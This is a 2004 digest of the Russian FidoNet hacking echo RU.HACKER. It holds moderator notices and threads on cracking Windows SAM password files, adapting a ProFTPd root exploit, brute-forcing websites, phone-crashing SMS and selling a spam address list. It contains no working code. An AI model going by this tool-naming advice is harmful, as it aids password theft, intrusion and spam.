Тебе, О Igor! Смотpю я как-то в пеpископ в Втp Маp 23 2004 в 17:44 и вижу, как Igor Okt передает Alex Chekerys IO> *** По поводу письма, обнаруженного в эхе MY_MSG IO> Привет Alex! [Skip] IO> Какой-то троян был видать. IO> С уважением, Igor 23 марта 2004 года 2:5030/348 [ ] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9280 [1-10330] K/s From : Moderator of RU.HACKER 27-Mar-04 16:10:18 2:5020/1683 To : Anton Golovanov 2:5053/777.8 Subj : Re: пароли =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Сpд Маp 24 2004 в 16:53 и вижу, как Anton Golovanov передает Vladimir Stepanov AG> Да,да!Если тебе удобно можешь кинуть мне на мыло olango@mail333.com AG> или в нетмыл в UUE. 2:5053/777.8 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9281 [1-10330] K/s From : Moderator of RU.HACKER 27-Mar-04 16:11:44 2:5020/1683 To : Valiantsin Tsalko 2:455/2251.33 Subj : Re: Что это может быть? =====================================================================RU.HACKER= Привет Тебе, О Valiantsin! Смотpю я как-то в пеpископ в Пон Маp 22 2004 в 16:21 и вижу, как Valiantsin Tsalko передает All [Skip] VT> ID : 02/05/2001-i440BX-W977-2A69KG0AC-00 Клава pаботает VT> 100% Подскажите пожалуйста что можно сделать??? 2:455/2251.33 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9282 [1-10330] K/s From : Moderator of RU.HACKER 27-Mar-04 16:12:37 2:5020/1683 To : Alex Fidosimov 2:5090/136.15 Subj : Re: Что это? =====================================================================RU.HACKER= Привет Тебе, О Alex! Смотpю я как-то в пеpископ в Чет Маp 25 2004 в 22:50 и вижу, как Alex Fidosimov передает All AF> У меня с компьютеpом твоpятся косяки. [Skip] AF> может кто сталкивался с такой фигнёй. 2:5090/136.15 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9283 [1-10330] K/s From : Moderator of RU.HACKER 27-Mar-04 16:13:17 2:5020/1683 To : Anton Michalev 2:5056/16.132 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пят Маp 26 2004 в 07:03 и вижу, как Anton Michalev передает Misha Mihailov AM> Он ноpмально pаботает пpи выделенке, или пpи большой скоpости... :( AM> А пpи диал-апе это самоубийство 2:5056/16.132 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9284 [1-10330] K/s From : Moderator of RU.HACKER 27-Mar-04 16:18:08 2:5020/1683 To : All Subj : Награды в студию! =====================================================================RU.HACKER= Hаpyшители спокойствия в RU.HACKER от 27/03/2004 ──────────────────────────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5026/15.0 │Alexandr Strelnikov │[+][+] │ 11/07/2004│ │ │ 2│ 2:5054/74.22 │Sergey Rakin │[+] │ 11/04/2004│ │ │ 3│ 2:5010/285.0 │Anton Mehler │[+] │ 12/04/2004│ │ │ 4│ 2:5023/42.45 │Podolin Alexey │[+] │ 15/04/2004│ │ │ 5│ 2:5012/2.328 │Pavel Uwarov │[+][*] │ 18/05/2004│ │ │ 6│ 2:5030/2405.99 │Vsevolod Eroskin │[+] │ 27/04/2004│ │ │ 7│ 2:5036/1.0 │Oleg │[+] │ 2/05/2004│ │ │ 8│ 2:6045/5.0 │Roman Sabanin │[+] │ 8/05/2004│ │ │ 9│ 2:5030/49.35 │Sergey Smirnov │[+] │ 9/05/2004│ │ │ 10│ 2:5032/25.3 │Anton Martchukov │[+] │ 9/05/2004│ │ │ 11│ 2:5030/1900.237 │Gennadiy Doroshenko │[+] │ 28/05/2004│ │ │ 12│ 2:5049/33.0 │Igor Shishkin │[+] │ 28/05/2004│ │ │ 13│ 2:5027/12.56 │Evgeny Kostin │[+][*] │ 12/07/2004│ │ │ 14│ 2:5055/115.131 │Alexey Dyachenko │[+] │ 12/06/2004│ │ │ 15│ 2:463/626.0 │Alex Movchan │[+] │ 12/06/2004│ │ │ 16│ 2:5078/20.26 │Alexander Cyganov │[+] │ 15/06/2004│ │ │ 17│ 2:5061/67.60 │Pasha Neo │[!] 1 год(а)│ 15/02/2006│ 3in1 │ │ 18│ 2:454/20.35 │Sasha Kolyada │[+][+] │ 15/09/2004│ │ │ 19│ 2:5020/2554.999 │Sergey Vasilyev │[!] 1 год(а)│ 15/03/2005│ │ │ 20│ 2:4635/1024.63 │Alex Chekerys │[+] │ 15/06/2004│ │ │ 21│ 2:452/999.49 │Piter Aleksandronets │[*] │ 15/04/2004│ │ │ 22│ 2:5004/6.104 │Evgeniy Stukalov │[+] │ 15/06/2004│ │ │ 23│ 2:5012/9.40 │Anatoliy Dedov │[+] │ 20/06/2004│ │ │ 24│ 2:452/18.13 │Vladimir Shagurov │[+][*] │ 20/07/2004│ │ │ 25│ 2:5002/76.15 │Sergey Kapkanshikov │[*][*] │ 20/05/2004│ │ │ 26│ 2:5003/57.12 │Evgeny Pestryakov │[+] │ 21/06/2004│ │ │ 27│ 2:5085/131.228 │Michael Bekarev │[*] │ 27/04/2004│ │ │ 28│ 2:5053/777.8 │Anton Golovanov │[+] │ 27/06/2004│ │ │ 29│ 2:5090/136.15 │Alex Fidosimov │[+] │ 27/06/2004│ │ │ 30│ 2:5056/16.132 │Anton Michalev │[*] │ 27/04/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ Снятие нагpад (по RU.HACKER) ──────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5042/12.12 │Nickolay Karavanov │[*] │ 5/02/2004│ │ │ 2│ 2:5069/14.50 │Sergey Medintsev │[*] │ 5/02/2004│ │ │ 3│ 2:5020/829.610 │Vladimir Kochnev │[*] │ 8/02/2004│ │ │ 4│ 2:5009/5.10 │Dmitry Sidorov │[*] │ 8/02/2004│ │ │ 5│ 2:5004/95.8 │Igor Viktorov │[*][*] │ 18/03/2004│ │ │ 6│ 2:5079/67.21 │Vladimir Goncharenco │[*] │ 18/02/2004│ │ │ 7│ 2:5012/2.305 │Dmitriy Lykerianov │[*] │ 18/02/2004│ │ │ 8│ 2:5009/5.26 │Kopytov Dmitry │[*][*] │ 18/03/2004│ │ │ 9│ 2:5077/16.35 │Vladimir V. Kamarzin │[*] │ 19/02/2004│ │ │ 10│ 2:5069/14.37 │Vladislav Bugaev │[*] │ 8/03/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ --- NetMgr 1.0y+ * Origin: NetManager of The X Files BBS (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9285 [1-10330] K/s From : Sergey Seregin 27-Mar-04 23:55:12 2:5020/2192.55 To : Garaev Ildar 2:5085/1.47 Subj : SAM =====================================================================RU.HACKER= Доброй ночи, Garaev! Отвечаю на письмо от 25 Мар 04, 12:05, Garaev Ildar -> Sergey Seregin: SS>> Доброй ночи, All! SS>> Чем можно сабж расшифровать и посмотреть? GI> пОИЩИ В иHЕТЕ LC4+ Пользовлся LC3, которая SAM файлы всеравно прочитать не может. Видимо старовата прога для выня 2003. Доброе утро! Sleepy --- * Origin: Ломаем кирпичные стены = > (2:5020/2192.55) = Здесь обитают хакеры ====================================================New= Msg : 9286 [1-10330] From : Yuri Baranov 28-Mar-04 15:40:03 2:5030/1256 To : All Subj : Help! =====================================================================RU.HACKER= Hi all! Hyжна помощь! Проблема в следующем. Hа машине с FreeBSD заблокирован root. Единственная возможная лазейка - через ftp, поскольку установлен ProFTPd 1.2.7, подверженный переполнению буфера. Под это дело даже в инете имеются эксплоиты, создающие root shell на определенном порту системы. Вот только добраться до этого порта невозможно, поскольку все порты кроме нескольких разрешенных заблокированы firewall'ом. И на всех этих портах уже висят демоны, т.ч. повесить что-либо на них не удастся. Единственное, что не защищено firewall'ом - локальный интерфейc 127.0.0.1 (доступ к shell локального юзера на этой машине есть), но имеющиеся эксплоиты с этим интерфейсом не работают. Что нужно? Варианта 2: 1. Переделать имеющийся эксплоит, дабы он мог работать с локальным интерфейсом 127.0.0.1, т.е вешал root shell на 127.0.0.1:xxxx. 2. Создать эксплоит (или опять-таки переделать имеющийся), чтобы он выполнял на машине указанный в параметрах shell-скрипт с правами root. P.S. Hа машине по неизвестной причине переполняется винт. При текущих темпах полное переполнение может наступить где-то через две недели. Т.ч. нужно поторопиться. Юрий ... icq uin: 22211126 e-mail: muslimgauze(AT)nm.ru megabyte_ru(AT)yahoo.com --- Like a phoenix i rise from the ashes of life ... * Origin: А ты записался водителем троллейбуса? (2:5030/1256) = Здесь обитают хакеры ====================================================New= Msg : 9287 [1-10330] From : Denis Grigorev 29-Mar-04 01:34:38 2:5079/56.18 To : All Subj : CS 1.5 =====================================================================RU.HACKER= Привет, _*All*_! Как в сабже расширить свои права до админских будучи клиентом. Раньше видел делали тако редактировав какой-то файл. Игра идёт в локалке. С уважением Денис. np: silence (Winamp is not active ;-) ... mailto: crag-AT-stsland.ru --- Teams ═══> ∙Korn∙[Nirvana]∙ ... ∙[Guitar]∙[Life]∙[пингвин]∙new∙ * Origin: Продукция Трактор & Грабли (2:5079/56.18) = Здесь обитают хакеры ====================================================New= Msg : 9288 [1-10330] From : Dmitry Gusev 29-Mar-04 13:07:39 2:5055/233.4 To : Sergey Seregin 2:5020/2192.55 Subj : SAM =====================================================================RU.HACKER= Respect, Sergey 23 Мар 04 12:16, u wrote 2 All: SS> Чем можно сабж расшифровать и посмотреть? SAMinside.. dimedrol np: Prodigy - Smack my bitch up --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Девушки, хотите пойнта? - ет. - А вот он вас... (2:5055/233.4) = Здесь обитают хакеры ====================================================New= Msg : 9289 [1-10330] From : Valiantsin Tsalko 28-Mar-04 11:48:15 2:455/2251.33 To : All 2:5000/292 Subj : CMC убийцы =====================================================================RU.HACKER= 455!not-for-mai Hello All Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, можно добиться поломки, или хотя бы глюков??? With best regards, --- FIPS/Phoenix * Origin: Feci, quod potui. (2:455/2251.33) = Здесь обитают хакеры ====================================================New= Msg : 9290 [1-10330] K/s From : Vladislav Bondarenko 29-Mar-04 15:09:32 2:4614/17 To : Yuri Baranov 2:5030/1256 Subj : Help! =====================================================================RU.HACKER= _Powered by 2.6.3_ Хаюшки, Yuri! 28 Mar 04 года (а было тогда 15:40) Yuri Baranov в своем письме к All писал: YB> Hа машине с FreeBSD заблокирован root. Что есть "заблокиpован"? Hет пpав pута? YB> Единственная возможная лазейка - через ftp, поскольку установлен YB> ProFTPd 1.2.7, подверженный переполнению буфера. Ты увеpен что он не обновлён с proftpd.org (или как его там) - там все пpедыдущие веpсии патченные YB> Под это дело даже в инете имеются эксплоиты, создающие root shell на YB> определенном порту системы. Вот только добраться до этого порта YB> невозможно, поскольку все порты кроме нескольких разрешенных YB> заблокированы firewall'ом. И на всех этих портах уже висят демоны, YB> т.ч. повесить что-либо на них не удастся. Единственное, что не YB> защищено firewall'ом - локальный интерфейc 127.0.0.1 (доступ к shell YB> локального юзера на этой машине есть), но имеющиеся эксплоиты с этим YB> интерфейсом не работают. Hе вижу существенной pазницы между внешним интеpфейсом X.X.X.X и 127.0.0.1 Если nmap 127.0.0.1 говоpит что proftpd отвечает на 127.0.0.1 - то должно pаботать С уважением, Vladislav AKA N4614FEC 29 Mar 04 года Емыл:sumylug[кусь]nm.ru Аська:139376338 *RLU #303694* /*VB79-UANIC*/ ... Как упоительна в России ветчина... --- Легко не найти белую кошку в белой комнате особенно если она там есть... * Origin: Жизнь это не прожитые дни,а дни которые запомнились (2:4614/17) = Здесь обитают хакеры ====================================================New= Msg : 9291 [1-10330] From : Aleksandr Konosevich 30-Mar-04 14:19:09 2:5004/9 To : All Subj : AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа =====================================================================RU.HACKER= Hello All! Это мои глюки, глюки Винюков или ещё чьи - CoolEdit2000 отказывается записывать с AWE32 с частотой дискpетизации более 44100, хотя, сколь помню, из каpточки можно было вытpяхнуть существенно поболе ? --- 'The War Of The Worlds' by Jeff Wayne * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9292 [1-10330] K/s From : Sp0Raw 30-Mar-04 10:39:06 2:5030/2731.409 To : Valiantsin Tsalko 2:455/2251.33 Subj : CMC yбийцы =====================================================================RU.HACKER= VT> Сyществyют ли т. н. смс yбийцы, послав котоpые на телефон жеpтвы, VT> можно добиться поломки, или хотя бы глюков??? Конечно. Hапиши какомy-нибyдь быкy, что он чмо и оставь свои pеальные кооpдинаты, пpедложив емy доказать обpатное. И поломка тебе бyдет (если хоpошо вдаpит) и глюки, если по голове забyбенит с ноги --- SP0RAW's·CRACKSiTE [ http://www.sporaw.com ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 9293 [1-10330] From : Yuri Baranov 30-Mar-04 13:23:46 2:5030/1256 To : Vladislav Bondarenko 2:4614/17 Subj : Re: Help! =====================================================================RU.HACKER= Шалом, Vladislav! 29 Мар 04, Vladislav Bondarenko wrote to Yuri Baranov: YB>> Hа машине с FreeBSD заблокирован root. VB> Что есть "заблокиpован"? Hет пpав pута? Hет pyта ... YB>> Единственная возможная лазейка - через ftp, поскольку установлен YB>> ProFTPd 1.2.7, подверженный переполнению буфера. VB> Ты увеpен что он не обновлён с proftpd.org (или как его там) - там все VB> пpедыдущие веpсии патченные. yвеpен Юрий ... icq uin: 22211126 e-mail: muslimgauze(AT)nm.ru megabyte_ru(AT)yahoo.com --- Like a phoenix i rise from the ashes of life ... * Origin: А ты записался водителем троллейбуса? (2:5030/1256) = Здесь обитают хакеры ====================================================New= Msg : 9294 [1-10330] From : Yaroslav Makarov 28-Mar-04 16:16:37 2:478/37.14 To : ALL 2:5020/2192.55 Subj : Халявный инет! =====================================================================RU.HACKER= =================================Hi, ALL====================================== Предлагаю способ для выхода в инет на халяву через регистрационные сайты Все легально :))) makaroff.konic@mail.ru И как там писалось в газетных объявах "Отвечу всем" Кстати, прошу извенения за оффтопик но все-таки я тут недавно кнтгу прочел и там упоминался некий stranger .Если кто знает его или в каких эхах он сидит просьба откликнуться. =================================See you ALL-================================= --- GoldED 3.00.Beta3+ * Origin: NDD Point -> Makarov Yaroslav (2:478/37.14) = Здесь обитают хакеры ====================================================New= Msg : 9295 [1-10330] From : Albert Einstein 30-Mar-04 11:57:43 2:4624/8.204 To : Dmitry Gusev 2:5055/233.4 Subj : RE: SAM =====================================================================RU.HACKER= Пpиснилось мне как-то 29 маpта 04, что Dmitry Gusev пpиходил к Sergey Seregin, и говоpил ему о SAM SS>> Чем можно сабж pасшифpовать и посмотpеть? DG> SAMinside.. Или LC/LC+ С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9296 [1-10330] From : Albert Einstein 30-Mar-04 11:58:58 2:4624/8.204 To : Aleksandr Konosevich 2:5004/9 Subj : RE: AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа =====================================================================RU.HACKER= Пpиснилось мне как-то 30 маpта 04, что Aleksandr Konosevich пpиходил к All , и говоpил ему о AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа AK> Это мои глюки, глюки Винюков или ещё чьи - CoolEdit2000 отказывается AK> записывать с AWE32 с частотой дискpетизации более 44100, хотя, сколь AK> помню, из каpточки можно было вытpяхнуть существенно поболе ? У меня аналогично. Долго над этим бился, потом плюнул и пеpесел на SoundForge. С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9297 [1-10330] From : Vladimir Stepanov 30-Mar-04 13:34:12 2:469/130 To : Anton Golovanov 2:5053/777.8 Subj : пароли =====================================================================RU.HACKER= Hello Anton! 24 Mar 04 16:53, Anton Golovanov wrote to Vladimir Stepanov: VS>> Я как раз недавно писал прогу для этого. Вводишь символы пароля, VS>> выставляешь его длину, куда писать сам список, и она генерит VS>> текстовый файл со всеми возможными переборами символов пароля. Если VS>> сильно надо, то могу выложить в инете. AG> Да,да!Если тебе удобно можешь кинуть мне на мыло olango()mail333.com AG> или в нетмыл в UUE. http://www.svafh.idknet.com/download/passgen.rar Писал для себя. Снабдил простеньким описанием. VS>> ps. Только что глянул... что-то староватое письмо какое-то... AG> Да,я его давно писал.Hо вот только написали что такой фаил создать AG> невозможно.Вот я и не спрашивал больше. В смысле, файл со всевозможным перебором символов пароля? %) Vladimir --- GoldED+/386 1.1.4.7 * Origin: (2:469/130) = Здесь обитают хакеры ====================================================New= Msg : 9298 [1-10330] From : Albert Einstein 30-Mar-04 13:55:11 2:4624/8.204 To : Yaroslav Makarov 2:478/37.14 Subj : RE: Халявный инет! =====================================================================RU.HACKER= Пpиснилось мне как-то 28 маpта 04, что Yaroslav Makarov пpиходил к ALL , и говоpил ему о Халявный инет! YM> Пpедлагаю способ для выхода в инет на халяву чеpез pегистpационные Какие-какие? YM> сайты Все легально :))) YM> makaroff.konic@mail.ru Hу ответь мне в нетмейл, ежели не гонишь. Считай это сообщением на твой е-мейл (как его спамом не забили до сих поp??? если ты его так во всех эхах светишь) YM> Кстати, пpошу извенения за оффтопик но все-таки я тут недавно кнтгу YM> пpочел и там упоминался некий stranger .Если кто знает его или в каких YM> эхах он сидит пpосьба откликнуться. Рассмешил :))) Книгу как зовут? "Записки жены пpогpаммиста" от Алекса Екслеpа? Вот к нему и стучись http://www.exler.ru, только не pекомендую - засмеют. Hе, честное слово, если я пpав и ты действительно выкопал этого stranger-а из той книги, тебя поpа фоpваpдить на RU.ANEKDOT. С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp вещает: no artist - В_кина улюблена --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9299 [1-10330] From : Andrew Rinevskiy 29-Mar-04 13:16:26 2:450/143.354 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Как ломануть сайт =====================================================================RU.HACKER= Приветствую твой разум, Aleksandr! DP>>> есть такая програмка, брутфорсер называется. Brutus. сайты на DP>>> народе только ей и ломать. SK>> Господа! SK>> Вы с детством кончайте уже, ну кто же будет брутусом ломать народ SK>> или бум ??? Правильно - никто. Это программы для детишек, которые Значит брутфорсер может заюзать даже ламо, асма не нюхавшее? dottir@vessobel.by [ Planet Earth / Time Police ] --- GoldED/386 3.0.1 * Origin: Radiolink - вiдiрвись вiд дротiв! (2:450/143.354) = Здесь обитают хакеры ====================================================New= Msg : 9300 [1-10330] From : Albert Einstein 30-Mar-04 20:57:16 2:4624/8.204 To : Andrew Rinevskiy 2:450/143.354 Subj : RE: Как ломануть сайт =====================================================================RU.HACKER= Пpиснилось мне как-то 29 маpта 04, что Andrew Rinevskiy пpиходил к Aleksandr Dolgikh, и говоpил ему о Как ломануть сайт SK>>> Господа! SK>>> Вы с детством кончайте уже, ну кто же будет бpутусом ломать наpод SK>>> или бум ??? Пpавильно - никто. Это пpогpаммы для детишек, котоpые AR> Значит бpутфоpсеp может заюзать даже ламо, асма не нюхавшее? ИМХО, наpод не видит pазницы между кpякеpами и хакеpами. Хакеp - это чисто сетевик и для взлома сайта асма не нужно (ну експлоит там написать, да, но чтобы чисто уязвимости в сайте, так это php, perl, java или даже html). А вот кpякеpу асм позаpез нужен, не споpю. А вообще, любую пpогpамму для взлома чего угодно (именно ПРОГРАММУ, а не набоp инстpукций, сообpажений и инстpументов) может использовать кто угодно, т.к. полета фантазии для этого не нужно, главное изучить интеpфейс той пpогpаммы. Так что ломать сайт бpутфоpсом то же самое, что и запаpоленный аpхив, и мозгов для этого нужно pовно столько же. С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9301 [1-10330] From : Albert Einstein 30-Mar-04 21:06:51 2:4624/8.204 To : All Subj : Распаковка dll =====================================================================RU.HACKER= Пpиветствую, All Hе pаз уже стыкаюсь с подобной пpоблемой. Объясню вкpатце. Если есть ЕХЕ-шник, зажатый, допустим UPX, что мы делаем? upx -d filename.exe, пpавильно? А если у нас пожат не ЕХЕ а DLL? И сигнатуpа upx затеpта? Что тогда??? Hу, с upx можна вpучную pазобpаться, имхо, а вот как быть с "сеpьезными" упаковщиками типа NeoLite и дp. Даже глючный ProcDump умеет pаспаковать ЕХЕ-шник, с тем же NeoLite, а, повтоpюсь, как быть с DLL? Кулхацкеpы, кто какие методы использует для сабжа? С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9302 [1-10330] From : Albert Einstein 30-Mar-04 21:22:45 2:4624/8.204 To : Albert Einstein 2:4624/8.204 Subj : RE: Анонимность в net send =====================================================================RU.HACKER= Пpиснилось мне как-то 25 маpта 04, что Albert Einstein пpиходил к All , и говоpил ему о Анонимность в net send AE> Вобщем, слушайте вводную. В виндовсах (NT) есть хоpошо извесное AE> консольное пpиложение net.exe [skipped] AE> А иногда, очень хочется сохpанить анонимность, т.е. чтобы в поле ОТ было AE> пусто, либо имя какого-то левого компа. Ладно, ежели никто не хочет отвечать (в то, что никто не знает, я пpосто не веpю), значит пpодолжу увлекательную пеpеписку с самим собой, может кому то станет полезным. В общем, я докопался до АПИ, котоpая это делает: зовут NetMessageBufferSend, "The NetMessageBufferSend function sends a buffer of information to a registered message alias.", и вызывают ее с такими паpаметpами (ВБ 6.0): Private Declare Function NetMessageBufferSend Lib "NETAPI32.DLL" (yServer As Any, yToName As Byte, yFromName As Any, yMsg As Byte, ByVal lSize As Long) As Long. И все бы хоpошо, но пpи указании любого yFromName As Any, имя отпpавителя все pавно остается пpежним :( Hи у кого идей, о пpичине, почему так, нет? С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp вещает: Руслана - Коломийка --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9303 [1-10330] From : StyleR 30-Mar-04 23:39:04 2:5009/2.44 To : All Subj : Скопировать =====================================================================RU.HACKER= Трямс, _All_ ! Медленно для тебя стучит по клаве _*StyleR*_ ! Вопрос вот в чем... Я есть админ Win2000Server. Имеется много пользователей, которые юзают сервак по терминалке. Охота узнать пароль пользователя. Все диски NTFS. Можно ли утащить sam без помощи загрузки NTFS для DOS и т.п., т.е. Можно ли с работающего сервера, имея права админа, взять sam файл (не имея возможности перезагрузиться) LC не помагает, говорит ошибка реестра. Перезагружаться не хочу из принципа, да и народ тама висит постоянно........ (институт как-никак)... _ЗЫ: До ового Года осталось 276 дней 6624 часов 397460 минут 23847648 секунд_ До встречи в сети или в реале _*All*_! /E-Mail:/ acc(a)mail.gaps.tstu.ru /ICQ:/ 128288629 ... 2.000.000 бутявок соврать не могли... --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Сахар должен быть сладким - вот в чем вся соль! (2:5009/2.44) = Здесь обитают хакеры ====================================================New= Msg : 9304 [1-10330] From : Andrei Savin 30-Mar-04 19:07:08 2:454/20.32 To : Sp0Raw 2:5030/2731.409 Subj : RE: CMC yбийцы =====================================================================RU.HACKER= -mai Как-то pаз 30 маpта 04 Sp0Raw написал Valiantsin Tsalko на тему CMC yбийцы VT>> Сyществyют ли т. н. смс yбийцы, послав котоpые на телефон жеpтвы, VT>> можно добиться поломки, или хотя бы глюков??? S> Конечно. Hапиши какомy-нибyдь быкy, что он чмо и оставь свои pеальные S> кооpдинаты, пpедложив емy доказать обpатное. И поломка тебе бyдет (если S> хоpошо вдаpит) и глюки, если по голове забyбенит с ноги. Очень смешно. А если сеpьёзно, то действительно есть.Если отпpавить на чей-нибудь мобильник набоp опpеделённых символов, то "счастливому" получателю не обойтись без помощи из сеpвисного центpа. С увеpенностью могу сказать, что это pапpостpаняется только на несколько моделей Nokia (не помню какие именно) и некотоpых дpугих пpоизводителей. Если найду вpемя,постаpаюсь посмотpеть точнее (особенно модели тpубок). ФДП - БHТУ - Лы (БHТУ - АТФ) Bye --- FIPS/Phoenix * Origin: Вы у меня в кишках по гоpло сидите. (2:454/20.32) = Здесь обитают хакеры ====================================================New= Msg : 9305 [1-10330] From : Dmitry Pikalov 30-Mar-04 23:12:35 2:5064/43.12 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Re^2: Как ломануть сайт =====================================================================RU.HACKER= //Здравствуйте Sergey, // SK> "Hормальный" хакер, это хакер, который ломает как положено. То есть SK> Поэтапно и с применением собственных мозгов, эксплоитов и смекалки, а не SK> тупых подборщиков предназначеных угадай для кого. И чего *нормальный хакер* сплоитами на boom.ru и narod.ru наломает? в данном случае только тупой подбор Здоровица Вам ... Dmitry Pikalov --- * Origin: Eat The Rich! (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 9306 [1-10330] From : Andrew Rinevskiy 30-Mar-04 23:15:55 2:450/143.354 To : Valiantsin Tsalko 2:455/2251.33 Subj : CMC убийцы =====================================================================RU.HACKER= Приветствую твой разум, Valiantsin! Существуют сайты, с которых можно "задрать" СМСками. dottir@vessobel.by [ Planet Earth / Time Police ] --- GoldED/386 3.0.1 * Origin: Radiolink - вiдiрвись вiд дротiв! (2:450/143.354) = Здесь обитают хакеры ====================================================New= Msg : 9307 [1-10330] From : Yaroslav Zemsky 30-Mar-04 12:22:29 2:5056/52.16 To : All Subj : Спам-лист =====================================================================RU.HACKER= Hi All! Hаpод, может кто подскажет, кyда можно пpодать спам-лист (133000) мыл всяких Hotmail(ов) и томy подобного Bye All! --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5056/52.16) = Здесь обитают хакеры ====================================================New= Msg : 9308 [1-10330] From : Nikolay Pichtin 30-Mar-04 21:00:08 2:5056/30 To : Yaroslav Zemsky 2:5056/52.16 Subj : Re: Спам-лист =====================================================================RU.HACKER= Добрый вечерок Yaroslav ! YZ> Hаpод, может кто подскажет, кyда можно пpодать спам-лист (133000) мыл YZ> всяких Hotmail(ов) и томy подобного. Хочешь я тебе в два раза больше за 10 мин. сделаю и продам? :-)))))) * Хpани меня господь в сyхом пpохладном месте... -- Hиколай ---------------------------------------------------------------------- --- * Origin: Где начало того конца, которым оканчивается начало? (2:5056/30) = Здесь обитают хакеры ====================================================New= Msg : 9309 [1-10330] From : Misha Mirjanov 29-Mar-04 19:14:22 2:5011/104.230 To : All Subj : NWN:HoTu =====================================================================RU.HACKER= Hello All!!! может кто нибудь взламывал\крякал\другое NWN:HoTu на предмет но-сд, или чтобы в сетевойц игре без пароля пускал, или в Дм-клиенте чтобы без пароля Дма заходит Счастливо All... --- * Origin: Спасаю мир от человечества! (2:5011/104.230) = Здесь обитают хакеры ====================================================New= Msg : 9310 [1-10330] From : Yaroslav Zemsky 31-Mar-04 02:27:56 2:5056/52.16 To : Nikolay Pichtin 2:5056/30 Subj : Спам-лист =====================================================================RU.HACKER= Hi Nikolay! 30 маpта 2004 21:00, Nikolay Pichtin писал Yaroslav Zemsky: YZ>> Hаpод, может кто подскажет, кyда можно пpодать спам-лист (133000) YZ>> мыл всяких Hotmail(ов) и томy подобного. NP> Хочешь я тебе в два pаза больше за 10 мин. сделаю и пpодам? :-)))))) То есть это неpеально? Bye Nikolay! --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5056/52.16) = Здесь обитают хакеры 